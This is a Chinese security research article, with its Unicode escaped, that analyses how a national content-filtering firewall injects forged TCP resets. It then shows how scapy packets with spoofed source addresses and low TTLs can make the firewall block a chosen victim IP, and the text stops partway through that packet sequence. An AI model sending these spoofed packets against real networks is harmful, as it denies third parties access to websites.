\u5bf9\u67d0\u6b3e\u56fd\u5bb6\u7ea7\u5185\u5bb9\u8fc7\u6ee4\u7cfb\u7edfDos\u5b89\u5168\u7f3a\u9677\u5206\u6790 <\/p>\n
Author: jianxin [80sec] [ \u76ee\u5f55 ] <\/p>\n 0x00 \u524d\u8a00 0x00 \u524d\u8a00 <\/p>\n \u6700\u8fd1\u5728\u5b66\u4e60\u7f51\u7edc\u57fa\u7840\u77e5\u8bc6\uff0c\u79c9\u627fHack to learn\u7684\u4f5c\u98ce\uff0c\u60f3\u5bf9\u5b66\u4e60\u505a\u4e2a\u603b\u7ed3\u5c31\u60f3\u5230\u5206\u6790\u4e00\u4e9b\u7f51\u7edc\u8bbe\u5907\u7684\u5b89\u5168\u95ee\u9898\u6765\u4f5c\u4e3a\u4e00\u6b21\u603b\u7ed3\u3002\u76f8\u4fe1\u5bf9\u4e8e\u67d0\u6b3e\u56fd\u5bb6\u7ea7\u5185\u5bb9\u8fc7\u6ee4\u7cfb\u7edf\u5927\u5bb6\u90fd\u4e0d\u964c\u751f\uff0c\u4e5f\u88ab\u79f0\u4e3a\u56fd\u5bb6\u8fb9\u754c\u9632\u706b\u5899\uff0c\u5176\u672c\u8d28\u4e0a\u53ea\u662f\u4e00\u6b3e\u5f3a\u5927\u7684\u5165\u4fb5\u68c0\u6d4b\u7cfb\u7edf\uff0c\u5e76\u4e14\u5728\u67d0\u4e9b\u884c\u4e3a\u53d1\u751f\u65f6\u5bf9\u7f51\u7edc\u653b\u51fb\u8fdb\u884c\u5b9e\u65f6\u7684\u8054\u52a8\u963b\u65ad\u3002\u8fd9\u91cc\u5bf9\u5b83\u7684\u4f5c\u7528\u5e76\u4e0d\u505a\u63a2\u8ba8\uff0c\u5bf9\u5982\u4f55\u7ed5\u8fc7\u5b83\u4e5f\u4e0d\u505a\u5206\u6790\uff0c\u8fd9\u91cc\u4ec5\u4ec5\u662f\u5c06\u5b83\u770b\u4f5c\u4e00\u6b3e\u529f\u80fd\u5f3a\u5927\u7684\u56fd\u5bb6\u7ea7IPS\uff0c\u4ece\u6280\u672f\u89d2\u5ea6\u6765\u8ba8\u8bba\u4e0b\u8fd9\u7c7bIPS\u5728\u5173\u952e\u7f51\u7edc\u90e8\u7f72\u65f6\u53ef\u80fd\u5b58\u5728\u7684\u4e00\u4e9b\u5b89\u5168\u95ee\u9898\u4ee5\u53ca\u5bf9\u666e\u901a\u7f51\u7ad9\u7684\u5f71\u54cd\u3002 <\/p>\n 0x01 know it\uff0c\u4e86\u89e3\u8fd9\u6b3e\u5185\u5bb9\u8fc7\u6ee4\u7cfb\u7edf <\/p>\n \u540c\u4e00\u822c\u7684\u5165\u4fb5\u68c0\u6d4b\u7cfb\u7edf\u6216\u8005\u5176\u4ed6\u53f7\u79f0\u7f51\u5173\u7ea7\u522b\u8fc7\u6ee4\u7cfb\u7edf\u7c7b\u4f3c\uff0c\u5b83\u5b9a\u4e49\u4e86\u4e00\u4e9b\u7b56\u7565\u4ee5\u963b\u6b62\u67d0\u4e9b\u5371\u9669\u7684\u7f51\u7edc\u8bbf\u95ee\uff0c\u5176\u7b56\u7565\u5305\u542b\u9759\u6001\u5c01\u7981\u4e5f\u5305\u542b\u52a8\u6001\u5c01\u7981\uff0c\u8b6c\u5982\u5bf9\u4e8eGoogle\u548cYahoo\u7c7b\u641c\u7d22\u5f15\u64ce\u6765\u8bf4\uff0c\u56fd\u5185\u7528\u6237\u5728\u4f7f\u7528\u8fd9\u4e9b\u7ad9\u70b9\u65f6\u5982\u679c\u89e6\u53d1\u4e86\u654f\u611f\u7684\u5173\u952e\u8bcd\u7684\u8bdd\uff0c\u5176IP\u5c31\u4f1a\u88ab\u52a8\u6001\u5c01\u7981\u4e00\u6bb5\u65f6\u95f4\uff0c\u51e0\u5206\u949f\u4e4b\u7c7b\u5c06\u4e0d\u80fd\u518d\u4f7f\u7528Google\uff0c\u8fd9\u91cc\u7684\u5173\u952e\u8bcd\u5c31\u662f\u88ab\u9632\u706b\u5899\u6240\u5b9a\u4e49\u7684\u5371\u9669\u884c\u4e3a\uff0c\u8b6c\u5982\u62ff\u5173\u952e\u8bcdFreenet\/freenet\u6765\u8bf4\uff0c\u5728Google\u91cc\u8fdb\u884c\u4e00\u6b21\u641c\u7d22\u8bf7\u6c42\u4e4b\u540e\u5c31\u4f1a\u53d1\u73b0Google\u5728\u51e0\u5206\u949f\u4e4b\u5185\u5c06\u4e0d\u518d\u80fd\u88ab\u8bbf\u95ee\uff0c\u591a\u4f59\u6240\u6709\u5176\u4ed6\u5904\u4e8e\u56fd\u5916\u7684\u670d\u52a1\u5668\u6548\u679c\u4e5f\u662f\u4e00\u6837\u3002\u6211\u5206\u6790\u7684\u6574\u4e2a\u8fc7\u7a0b\u5982\u4e0b: <\/p>\n \u9996\u5148\u5bf9\u6b63\u5e38\u7684\u4e00\u6b21Google\u8bbf\u95ee\u6293\u5305\uff0c\u53ef\u4ee5\u770b\u5230\u7ed3\u679c\u5982\u4e0b\uff1a <\/p>\n bt ~ # tcpdump -vv -nn -S host 64.233.189.103 and port 80 \u6211\u4eec\u53ef\u4ee5\u770b\u5230\u5b8c\u6574\u7684\u4e00\u6b21\u8bf7\u6c42\u8fc7\u7a0b\uff0c\u5148\u662f\u4e09\u6b21\u63e1\u624b\uff0c\u7136\u540e\u662f\u53d1\u6570\u636e\u5305\u4ee5\u53ca\u670d\u52a1\u5668\u548c\u5ba2\u6237\u7aef\u4e4b\u95f4\u7684\u5b8c\u6574\u4ea4\u4e92\uff0c\u4ece\u8fd9\u91cc\u6211\u4eec\u53ef\u4ee5\u8bc6\u522b\u51faGoogle\u670d\u52a1\u5668\u7684\u4e00\u4e9b\u6307\u7eb9\u7279\u5f81\uff0c\u8b6c\u5982\u672a\u8bbe\u7f6e\u4e0d\u5206\u7247\u6807\u5fd7\uff0cTTL\u503c\u6bd4\u8f83\u6052\u5b9a\u4e3a50\u7b49\u7b49\u3002 bt ~ # nc -vv 64.233.189.103 80 sent 26, rcvd 0 \u53ef\u4ee5\u770b\u5230\u4e00\u53d1\u9001\u975e\u6cd5\u7684\u8bf7\u6c42\u4e4b\u540eGoogle\u5c31\u4e3b\u52a8\u65ad\u5f00\u4e86\u94fe\u63a5\uff0c\u6574\u4e2a\u8fc7\u7a0b\u7684\u7f51\u7edc\u6293\u5305\u5982\u4e0b\uff1a <\/p>\n bt ~ # tcpdump -vv -nn -S host 64.233.189.103 and port 80 \u53ef\u4ee5\u770b\u5230\u7684\u662f\uff0c\u7528\u6237\u5728\u53d1\u9001\u5b8cpush\u5305\u4e4b\u540e\uff0cGoogle\u7684\u670d\u52a1\u5668\u4e5f\u5c31\u662f64.233.189.103\u8fd4\u56de\u4e86ack\u6570\u636e\u5305\u8868\u793a\u6536\u5230\u4e86\u8be5\u8bf7\u6c42\uff0c\u5e76\u4e14\u56de\u590d\u7684ack\u5305\u7684\u5e8f\u5217\u53f7\u8ddf\u9884\u671f\u7684\u4e00\u81f4\uff0c\u8fd9\u91cc\u6709\u4e24\u6b21push\u662f\u56e0\u4e3a\u6211\u7528nc\u63d0\u4ea4\u7684\uff0c\u52a0\u7684\u56de\u8f66\u4f1a\u5355\u72ec\u53d1\u4e00\u4e2a\u8fc7\u53bb\u3002\u8fd9\u6837\u7406\u8bba\u4e0a\u670d\u52a1\u5668\u5e94\u8be5\u9a6c\u4e0a\u4f1a\u56de\u590d\u4e00\u4e2apush\u5305\u54cd\u5e94\u6211\u4eec\u524d\u9762\u7684\u8bf7\u6c42\uff0c\u4f46\u662f\u7ed3\u679c\u6211\u4eec\u6536\u5230\u4e86\u4e00\u4e2a\u610f\u5916\u7684rst\u5305\u5982\u4e0b\uff1a <\/p>\n 22:54:32.148169 IP (tos 0x0, ttl 53, id 64, offset 0, flags [none], proto TCP (6), length 40) 64.233.189.103.80 > 192.168.1.4.42909: R, cksum 0x3399 (correct), 1209516568:1209516568(0) win 2605 <\/p>\n \u5e76\u4e14\u8be5\u8be1\u5f02\u7684tcp\u5305\u8fd8\u53d1\u4e86\u4e24\u6b21\uff0c\u7136\u540e\u6211\u4eec\u7684\u5ba2\u6237\u7aef\u5c31\u4ee5\u4e3a\u670d\u52a1\u5668\u91cd\u7f6e\u4e86\u8be5\u94fe\u63a5\uff0c\u8fd9\u4e2a\u65f6\u5019\u670d\u52a1\u5668\u8fd8\u8001\u8001\u5b9e\u5b9e\u7684\u56de\u590d\u4e86\u4e00\u4e2a\u5bf9\u524d\u9762\u7684push\u5305\u7684\u786e\u8ba4\u5305\uff0c\u4e0d\u8fc7\u8fd9\u4e2a\u5305\u5df2\u7ecf\u88ab\u524d\u9762\u83ab\u540d\u5176\u5999\u7684rst\u5305\u7528\u6389\u4e86\uff0c\u5e76\u4e14\u5ba2\u6237\u7aef\u4e5f\u6309\u8981\u6c42\u91cd\u7f6e\u4e86\u94fe\u63a5\uff0c\u6240\u4ee5\u5c31\u56de\u590d\u4e86\u4e00\u4e2arst\u5305\uff1a <\/p>\n 22:54:32.151840 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40) 192.168.1.4.42909 > 64.233.189.103.80: R, cksum 0xbd24 (correct), 2729633822:2729633822(0) win 0 <\/p>\n \u6069\uff0c\u8fd9\u4e2atcp\u94fe\u63a5\u5230\u8fd9\u91cc\u73a9\u5b8c\u4e86\u3002\u90a3\u4e48\u8fd9\u4e2a\u83ab\u540d\u5176\u5999\u7684rst\u5305\u662f\u8c01\u53d1\u51fa\u6765\u7684\u5462\uff1f\u9996\u5148\u6765\u786e\u8ba4\u4e0b\u662f\u4e0d\u662fGoogle\u81ea\u5df1\u62bd\u98ce\u53d1\u51fa\u6765\u7684\u5427\u3002\u6ce8\u610f\u6700\u4e0a\u9762\u63d0\u5230\u7684\u6b63\u5e38\u60c5\u51b5\u4e0b\u6765\u81eaGoogle\u8fd4\u56de\u7684\u5305\u7684\u6307\u7eb9\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u5230\u5982\u4e0b\u51e0\u4e2a\u5730\u65b9\u53d1\u751f\u4e86\u660e\u663e\u7684\u53d8\u5316\uff1a <\/p>\n 22:54:15.831374 IP (tos 0x0, ttl 50, id 12868, offset 0, flags [none], proto TCP (6), length 60) 64.233.189.103.80 > 192.168.1.4.42909: S, cksum 0x9163 (correct), 1209516567:1209516567(0) ack 2729633796 win 5672 <mss 1412,sackOK,timestamp 1081539534 550775,nop,wscale 6> \u9996\u5148ttl\u53d1\u751f\u4e86\u53d8\u5316\uff0c\u8fd9\u5728\u9ed8\u8ba4\u60c5\u51b5\u4e0b\u57fa\u672c\u4ee3\u8868\u4e86\u8bbe\u5907\u5728\u7f51\u7edc\u4e0a\u7684\u4f4d\u7f6e\uff0c\u53e6\u5916ID\u5728\u7cfb\u7edf\u5185\u88ab\u7528\u6765\u8bc6\u522b\u4e00\u4e2atcp\u5305\uff0c\u660e\u663e\u7684\u5dee\u5f02\u8fc7\u5927\uff0c\u7136\u540eGoogle\u7684\u670d\u52a1\u5668\u8fd8\u8fd4\u56de\u4e86\u4e00\u5806\u53ef\u9009\u5b57\u6bb5\u7684\u5185\u5bb9\uff0c\u4f46\u662f\u90a3\u4e2a\u602a\u5f02\u7684rst\u5305\u5b8c\u5168\u6ca1\u6709\u8fd9\u4e2a\u7279\u5f81\uff0c\u901a\u8fc7\u8fd9\u4e9b\u57fa\u672c\u53ef\u4ee5\u786e\u8ba4\u8fd9\u4e2arst\u5305\u5e76\u975e\u6765\u81ea\u4e8e\u771f\u6b63\u7684Google\u670d\u52a1\u5668\uff0c\u901a\u8fc7\u591a\u6293\u51e0\u6b21\u6570\u636e\u5305\u5c31\u53ef\u4ee5\u8bc1\u660e\u8fd9\u4e2a\u7ed3\u8bba\u3002\u90a3\u4e48\u8fd9\u4e2a\u8bbe\u5907\u662f\u51fa\u4e8e\u54ea\u4e2a\u4f4d\u7f6e\u5462\uff1f\u6211\u4eec\u7b80\u5355\u7684tracert\u4e0b\u770b\u770b\u7ed3\u679c\uff1a <\/p>\n traceroute to 64.233.189.103 (64.233.189.103), 30 hops max, 38 byte packets ttl\u662f\u6570\u636e\u5305\u5728\u7f51\u7edc\u4e0a\u7684\u5b58\u6d3b\u65f6\u95f4\uff0c\u6bcf\u7ecf\u8fc7\u4e00\u4e2a\u8def\u7531\u5668\u8fd9\u4e2attl\u5c31\u4f1a\u51cf1\uff0c\u53ef\u4ee5\u907f\u514d\u67d0\u4e9b\u6570\u636e\u5305\u65e0\u6b62\u5883\u7684\u5728\u7f51\u7edc\u4e0a\u4f20\u8f93\uff0c\u6240\u4ee5\u53ef\u4ee5\u88ab\u7528\u6765\u786e\u8ba4\u8bbe\u5907\u79bb\u6211\u4eec\u4e3b\u673a\u5728\u7f51\u7edc\u4e0a\u7684\u8df3\u6570\u548c\u8ddd\u79bb\u3002\u6211\u4eec\u5728\u6293\u5305\u7684\u65f6\u5019\u53ef\u4ee5\u53d1\u73b0\u6211\u4eec\u9ed8\u8ba4\u53d1\u51fa\u53bb\u7684\u6570\u636e\u5305ttl\u662f64\uff0c\u6211\u8fd9\u91cc\u7528\u7684\u662flinux\u7684\u7cfb\u7edf\uff0c\u4e00\u822c\u7684\u7f51\u7edc\u8bbe\u5907\u521d\u59cb\u503c\u4e3a64\uff0c128\uff0c255\uff0clinux\u7c7b\u7cfb\u7edf\u7684\u521d\u59cb\u503c\u4e00\u822c\u90fd\u4e3a64\uff0c\u6240\u4ee5\u8fd9\u91cc\u6211\u4eec\u53ef\u4ee5\u770b\u5230Google\u8fd4\u56de\u503c\u662f50\uff0c\u8fd9\u662f\u53ef\u4ee5\u786e\u8ba4\u7684\uff0c\u56e0\u4e3a\u53ef\u4ee5\u770b\u5230\u6211\u4eec\u5230google\u670914\u8df3\uff0c\u4e00\u822clinux\u670d\u52a1\u5668\u7684\u521d\u59cb\u503c\u4e3a64\uff0c\u5230\u6211\u4eec\u8fd9\u6b63\u597d\u662f50\u3002\u90a3\u4e48\u8fd9\u4e2attl=53\u7684\u5f02\u5e38\u5305\u662f\u5728\u54ea\u5462\uff1f64-53=11\uff0c\u54e6\uff0c\u5e94\u8be5\u662f\u572811\u8df3\u5de6\u53f3\uff0c\u5230\u8def\u7531\u4e0a\u94fe\u4e0a\u627e\u627e\u5c31\u53d1\u73b0\u53ef\u80fd\u662f64.233.175.207\u8fd9\u4e2aIP\u53d1\u7684\uff0c\u4f46\u662f\u53bb\u67e5\u5374\u4f1a\u53d1\u73b0\u8fd9\u4e2aip\u662fGoogle\u7684\uff0c\u7c73\u56fd\u4eba\u6c11\u52ab\u6301\u6211\u4eec\u7684\u6570\u636e\u5305\u4e0d\u8ba9\u8bbf\u95eeGoogle\uff1f\u4e0d\u592a\u9760\u8c31\u554a\uff0c\u90a3\u4e48\u5f88\u53ef\u80fd\u662f\u4ece\u7b2c10\u65c1\u8def\u51fa\u53bb\u7684\u5305\uff0c\u67e5\u67e5\u7b2c10\u8df3\u53d1\u73b0\u662f\u7f51\u901a\u9aa8\u5e72\u7f51\u7684\uff0c\u8fd9\u7406\u8bba\u4e0a\u5c31\u662f\u53ef\u80fd\u7684\u4e86\uff0c\u5f53\u7136\uff0c\u8fd9\u4e4b\u524d\u7684\u8282\u70b9\u90fd\u6709\u53ef\u80fd\uff0c\u4f46\u662f\u6700\u6709\u53ef\u80fd\u7684\u5e94\u8be5\u8fd8\u662f\u8fd9\u4e2a\u8282\u70b9\uff0c\u56e0\u4e3a\u8fd9\u4e2a\u8282\u70b9\u53ef\u4ee5\u76d1\u89c6\u6240\u6709\u51fa\u53e3\u7684\u6d41\u91cf\u561b\uff01 bt ~ # nc -vv 64.233.189.103 80 \u8fd9\u91cc\u6211\u6309\u4e86\u4e0bctrl+c\u7684 <\/p>\n bt ~ # tcpdump -nn -vv -S port 80 \u90a3\u4e48\u5982\u679c\u89e6\u53d1\u89c4\u5219\u4e4b\u540e\u7684\u8bf7\u6c42\u662f\u4ec0\u4e48\u6837\u5b50\u7684\u5462\uff1a <\/p>\n bt ~ # tcpdump -vv -nn -S host 64.233.189.103 and port 80 \u4e09\u6b21\u63e1\u624b\u4e4b\u540e\uff0c\u7acb\u523b\u90a3\u4e2a\u83ab\u540d\u5176\u5999rst\u5305\u51fa\u73b0\u4e86\uff0c\u5c31\u5728\u670d\u52a1\u5668\u7b49\u5f85\u5ba2\u6237\u7aef\u7ed9\u5b83\u6570\u636e\u7684\u65f6\u5019\uff0c\u6211\u4eec\u4e00\u4e2arst\u5305\u7ed3\u675f\u4e86\u8fd9\u4e2atcp\u8fde\u63a5\u7684\u751f\u547d\uff0c\u8fd9\u4e2a\u7279\u5f81\u4f9d\u7136\u5f88\u660e\u663e\uff0cid\u662f64\uff0cttl=53\u3002\u4f46\u662f\u5728\u53e6\u5916\u7684\u4e00\u6b21\u6d4b\u8bd5\u8fc7\u7a0b\u4e2d\uff0c\u6211\u6293\u5230\u4e86\u8fd9\u6837\u7684\u5305\uff1a <\/p>\n bt ~ # tcpdump -nn -vv -S port 80 \u4e00\u4e2a\u4e2d\u95f4\u7684\u670d\u52a1\u5668\u62a2\u5728\u771f\u6b63\u7684Google\u670d\u52a1\u5668\u4e4b\u524d\u7ed9\u6211\u4eec\u54cd\u5e94\u4e86\u6211\u4eec\u7684\u8bf7\u6c42\uff0c\u800cGoogle\u7684\u56de\u5e94\u5374\u56e0\u4e3a\u5e8f\u5217\u53f7\u51fa\u73b0\u5dee\u9519\u5bfc\u81f4\u670d\u52a1\u5668\u7ed9\u6211\u4eec\u53d1\u91cd\u7f6e\u5305\uff0c\u800c\u5728\u6b64\u8fc7\u7a0b\u4e2d\uff0cttl=43,46,53,48\u7684\uff0cID\u6a21\u62df\u6b63\u5e38\u7684\u670d\u52a1\u5668\u5411\u6211\u4eec\u8fde\u56de\u4e86N\u4e2arst\u5305\uff0c\u8fd9\u4e2a\u94fe\u63a5\u5fc5\u6b7b\u65e0\u7591\u4e86\uff0c\u53ef\u89c1\u5b83\u591a\u4e48\u75db\u6068\u6211\u8fd9\u4e2a\u94fe\u63a5\u3002\u4e5f\u8bb8\u6211\u6293\u5230\u7684\u5e76\u4e0d\u662f\u6700\u5168\u7684\uff0c\u4f46\u662f\u57fa\u672c\u539f\u7406\u5e94\u8be5\u90fd\u7c7b\u4f3c\u7684\uff0c\u800c\u4e14\u8fd9\u79cd\u53d1\u9001\u7684ID\uff0cttl\u90fd\u662f\u4f2a\u9020\u7684\uff0c\u4ee5\u8fd9\u79cd\u65b9\u5f0f\u5f88\u96be\u5b9a\u4f4d\u5230\u5177\u4f53\u7684\u8bbe\u5907\u4f4d\u7f6e\u548c\u76f4\u63a5\u8fc7\u6ee4\u6389\uff0c\u540e\u9762\u4f1a\u8bf4\u5230\u53e6\u5916\u4e00\u79cd\u5b9a\u4f4d\u65b9\u6cd5\uff1a\uff09\u8fd9\u4e2a\u52a8\u6001\u7684ACL\u5728\u8fc7\u4e24\u5206\u949f\u6700\u540e\u4f1a\u88ab\u6e05\u9664\uff0c\u7528\u6237\u6062\u590d\u5bf9\u7f51\u7ad9\u7684\u8bbf\u95ee\u3002 <\/p>\n 0x02 Hack it\uff0c\u5bf9\u9632\u706b\u5899\u7c7bids\u7684\u4e00\u4e9b\u5b89\u5168\u7814\u7a76 <\/p>\n \u6211\u4eec\u5728\u9ed1\u76d2\u7684\u65b9\u5f0f\u4e86\u89e3\u4e86\u6b64\u7c7bids\u7684\u57fa\u672c\u539f\u7406\u4e4b\u540e\uff0c\u5c31\u53ef\u4ee5\u60f3\u60f3\u8fd9\u7c7bids\u7684\u4e00\u4e9b\u5b89\u5168\u95ee\u9898\u4e86\uff0c\u8fd9\u91cc\u8bf4\u7684\u5b89\u5168\u95ee\u9898\u4e0d\u662f\u4e0a\u9762\u63d0\u5230\u7684\u7ed5\u8fc7\uff0c\u800c\u662f\u5176\u4ed6\u6211\u4eec\u5728\u65e5\u5e38\u5de5\u4f5c\u4e2d\u53ef\u80fd\u9047\u5230\u7684\u95ee\u9898\uff0c\u8fd9\u91cc\u5bf9\u8bbe\u5907\u7684\u6027\u80fd\u6d4b\u8bd5\uff0c\u8bef\u62a5\u7387\u7b49\u4e5f\u4e0d\u505a\u7814\u7a76\uff0c\u8fd9\u4e9b\u4e5f\u4e0d\u662f\u6211\u4eec\u53ef\u4ee5\u53bb\u8003\u8651\u7684\u95ee\u9898\uff0c\u8fd9\u91cc\u4e3b\u8981\u662f\u6765\u81ea\u4e8e\u4e00\u4e2a\u601d\u8def\uff0c\u65e2\u7136\u8fd9\u4e2a\u795e\u5947\u7684\u8bbe\u5907\u5df2\u7ecf\u4f5c\u4e3a\u4e00\u4e2a\u57fa\u672c\u5b89\u5168\u8bbe\u65bd\uff0c\u5b83\u7684\u52a8\u6001\u5c01\u7981\u673a\u5236\u4f1a\u4e0d\u4f1a\u53ef\u4ee5\u88ab\u5229\u7528\u6765\u5bf9\u67d0\u4e9b\u5883\u5916\u7684\u7f51\u7ad9\u8fdb\u884c\u5c4f\u853d\u6765\u5b9e\u73b0\u5bf9\u56fd\u5185\u7528\u6237\u7684Dos\uff0c\u636e\u4e00\u4e9b\u5a92\u4f53\u8bf4\u7f8e\u56fd\u4e5f\u6709\u7c7b\u4f3c\u7684\u8bbe\u65bd\uff0c\u4f46\u662f\u7f8e\u56fd\u53ea\u4f1a\u8bb0\u5f55\u800c\u4e0d\u4f1a\u505a\u7c7b\u4f3c\u4e8eIPS\u7684\u52a8\u4f5c\u4e3b\u52a8\u5207\u65ad\u6709\u5a01\u80c1\u7684\u7684\u53cc\u65b9\uff0c\u8fd9\u91cc\u7684\u6d4b\u8bd5\u4e0d\u518d\u662f\u88ab\u52a8\u7684\u6293\u5305\u4e86\uff0c\u6211\u4eec\u4f7f\u7528\u4e00\u6b3e\u5f3a\u5927\u7684\u7f51\u7edc\u6570\u636e\u5305\u8c03\u8bd5\u5de5\u5177\uff0cscapy\uff0c\u5bf9\u4e8e\u6211\u8fd9\u79cd\u53ea\u6709\u811a\u672c\u57fa\u7840\u7684\u4eba\u6765\u8bf4\u6bd4\u8f83\u5bb9\u6613\u4e0a\u624b\uff0c\u57fa\u672c\u7528\u6cd5\u5982\u4e0b\uff1a <\/p>\n Welcome to Scapy (v1.1.1 \/ f88d99910220) \u6211\u4eec\u53ef\u4ee5\u5f88\u7b80\u5355\u6ef4\u4fee\u6539\u8fd9\u4e9b\u9009\u9879\u6765\u6784\u9020\u9002\u5408\u81ea\u5df1\u7684\u5305\u5e76\u4e14\u53d1\u9001\u51fa\u53bb\uff0c\u8b6c\u5982\uff1a <\/p>\n >>>send(IP(dst="64.233.189.103")\/TCP(dport=80,sport=57474,flags="P",seq=945149829)\/"We are 80sec,play with packets") <\/p>\n \u5c31\u4f1a\u5411Google\u7684\u670d\u52a1\u5668\u53d1\u9001\u4e00\u4e2a\u6e90\u7aef\u53e3\u662f57474\uff0c\u5e8f\u5217\u53f7\u662f945149829\u7684push\u5305\u4e86\uff0c\u5305\u7684\u5185\u5bb9\u5c31\u662fWe are 80sec\u3002 >>> send(IP(dst="64.233.189.103",src="121.121.121.121")\/TCP(dport=80,sport=57474,flags="P",seq=945149829)\/"\/?q=freenet\/freenet") <\/p>\n \u8fd9\u662f\u4e00\u4e2a\u5b8c\u5168\u626f\u6de1\u7684\u6570\u636e\u5305\uff0c\u5168\u90e8\u90fd\u662f\u4f2a\u9020\u7684\uff0c\u5982\u679c\u8fd9\u4e2a\u6570\u636e\u5305\u4f1a\u89e6\u53d1\u89c4\u5219\u7684\u8bdd\uff0c\u90a3\u4e48121.121.121.121\u5c31\u4e0d\u80fd\u8bbf\u95ee64.233.189.103\u8fd9\u4e2aGoogle\u7684ip\u4e86\uff0c\u7ed3\u679c\u663e\u800c\u6613\u89c1\uff0c\u6ca1\u6709\u4efb\u4f55\u5f71\u54cd\u3002\u6211\u4eec\u7ee7\u7eed\u6765\u6d4b\u8bd5\uff0c\u53d1\u9001: <\/p>\n >>> send(IP(dst="64.233.189.103")\/TCP(dport=80,sport=57474,flags="P",seq=945149829)\/"\/?q=freenet\/freenet") <\/p>\n \u540c\u65f6\u5728\u672c\u673a\u6293\u5305\u4ee5\u5f97\u5230\u670d\u52a1\u5668\u7684\u54cd\u5e94\uff0c\u4e00\u65e6\u6210\u529f\u6211\u4eec\u5c31\u53ef\u4ee5\u628a\u6e90IP\u6362\u6210\u60f3\u8981\u653b\u51fb\u7684IP\u4e86\uff0c\u53d1\u51fa\u53bb\u540e\u53ea\u80fd\u6293\u5230\u81ea\u5df1\u51fa\u53bb\u7684\u5305\uff0c\u6ca1\u6709\u4efb\u4f55\u670d\u52a1\u7aef\u7684\u54cd\u5e94\uff0c\u81ea\u7136\u4e0d\u5305\u62ec\u8fd9\u4e2a\u795e\u5947\u7684\u8bbe\u5907\u7684\uff0c\u6293\u5305\u5982\u4e0b\uff1a <\/p>\n tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes \u8fd9\u4e2a\u5305\u4e0d\u53ea\u8fd9\u4e2a\u795e\u5947\u7684\u8bbe\u5907\u5ffd\u7565\u4e86\uff0cGoogle\u670d\u52a1\u5668\u4e5f\u5ffd\u7565\u4e86\uff0c\u8fd9\u91cc\u6211\u6362\u4e86\u4e2a\u6d4b\u8bd5\u73af\u5883\uff0c\u56e0\u4e3a\u6211\u5904\u4e8eNAT\u7684\u73af\u5883\uff0c\u4e3a\u4e86\u53ef\u4ee5\u76f4\u63a5\u4f2a\u9020\u6240\u6709\u7684ip\u5305\uff0c\u6211\u4f7f\u7528\u4e86\u670b\u53cb\u7684\u670d\u52a1\u5668\u505a\u6d4b\u8bd5\uff0c\u597d\u5904\u5c31\u662f\u4f2a\u9020\u7684ip\u4e0d\u4f1a\u88abNAT\u9632\u706b\u5899\u4e22\u5f03\u4e5f\u4e0d\u4f1a\u7ed9\u6211\u8f6c\u6362\u6211\u7684\u7aef\u53e3\u5e8f\u5217\u53f7\u4e4b\u7c7b\u3002\u6211\u6d4b\u8bd5\u4e86Syn\uff0cAck\u7b49\u5305\uff0c\u90fd\u53d1\u73b0\u6570\u636e\u5305\u987a\u5229\u7684\u5230\u8fbe\u4e86Google\u670d\u52a1\u5668\uff0c\u4e0d\u8fc7\u6ca1\u6709\u8fdd\u53cd\u8fd9\u4e2a\u795e\u5947\u7684\u8bbe\u5907\u7684\u89c4\u5219\u3002 tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes \u5475\u5475\uff0c\u7136\u540e\u6211\u4eec\u6784\u9020\u4e00\u4e2a\u63a5\u8fd1\u771f\u5b9e\u7684\u4e94\u5143\u7ec4\u90fd\u6b63\u786e\u7684\u94fe\u63a5\uff0c\u53ea\u6709\u5e8f\u5217\u53f7\u662f\u9519\u8bef\u7684\uff1a <\/p>\n >>> send(IP(dst="64.233.189.103")\/TCP(dport=80,sport=60931,flags="P",seq=123456)\/"\/?q=freenet\/freenet") <\/p>\n \u670d\u52a1\u5668\u8fd4\u56de <\/p>\n 00:52:12.606688 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto: TCP (6), length: 59) 114.249.114.249.60931 > 64.233.189.103.80: P, cksum 0xbfcf (correct), 123456:123475(19) win 8192 >>> send(IP(dst="64.233.189.103",ttl=10)\/TCP(dport=80,sport=2222,flags="S",seq=1234567)) \u6ce8\u610f\u6211\u5728\u4f2a\u9020ttl\u7684\u65f6\u5019\u4f7f\u7528ttl=10\uff0c\u8fd9\u4e2a\u65f6\u5019\u53ef\u4ee5\u907f\u514d\u6570\u636e\u5305\u4f20\u5230\u771f\u6b63\u7684Google\u670d\u52a1\u5668\uff0c\u670d\u52a1\u5668\u8fd4\u56deack\u7684\u65f6\u5019\u88ab\u4f2a\u9020\u7684IP\u4f1a\u53d1rst\u91cd\u7f6e\u94fe\u63a5\u800c\u5bfc\u81f4\u53d1\u8d77\u6570\u636e\u5931\u8d25\uff0c\u9632\u706b\u5899\u4f1a\u770b\u5230\u8fd9\u4e2arst\u5305\u800c\u8ba4\u4e3a\u540e\u9762\u7684push\u5305\u5df2\u7ecf\u8fc7\u65f6\u3002\u901a\u8fc7\u53d1\u51fa\u4e0a\u9762\u7684\u8fd9\u4e09\u4e2a\u4f2a\u9020\u7684\u6570\u636e\u5305\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u8ba964.233.189.103\u5bf9\u6211\u7684IP\u4e0d\u53ef\u8bbf\u95ee\uff0c\u53ef\u4ee5\u770b\u5230\u5176\u4e2d\u7684\u5305\u62ec\u6e90\u7aef\u53e3\uff0c\u76ee\u7684\u7aef\u53e3\uff0c\u5e8f\u5217\u53f7\u90fd\u662f\u6211\u81ea\u5df1\u5b9a\u4e49\u7684\uff0c\u5728\u9632\u706b\u5899\u770b\u6765\uff0c\u5c31\u662f\u6211\u5728\u8ddf64.233.189.103\u53d1\u8d77\u975e\u6cd5\u94fe\u63a5\uff0c\u6bd5\u7adf\u5b83\u53ea\u80fd\u5b8c\u5168\u4fe1\u4efb\u6211\uff0c\u5b83\u6ca1\u6709\u5176\u4ed6\u7684\u53ef\u4ee5\u4fe1\u4efb:)\uff0c\u60f3\u8ba9121.121.121.121\u4e0d\u80fd\u8bbf\u95eeGoogle\u768480\u7aef\u53e3\u53ea\u9700\u8981\u53d1\u9001\u4e0b\u9762\u4e09\u4e2a\u5305\uff1a <\/p>\n >>> send(IP(dst="64.233.189.103",src="121.121.121.121",ttl=10)\/TCP(dport=80,sport=2222,flags="S",seq=1234567)) 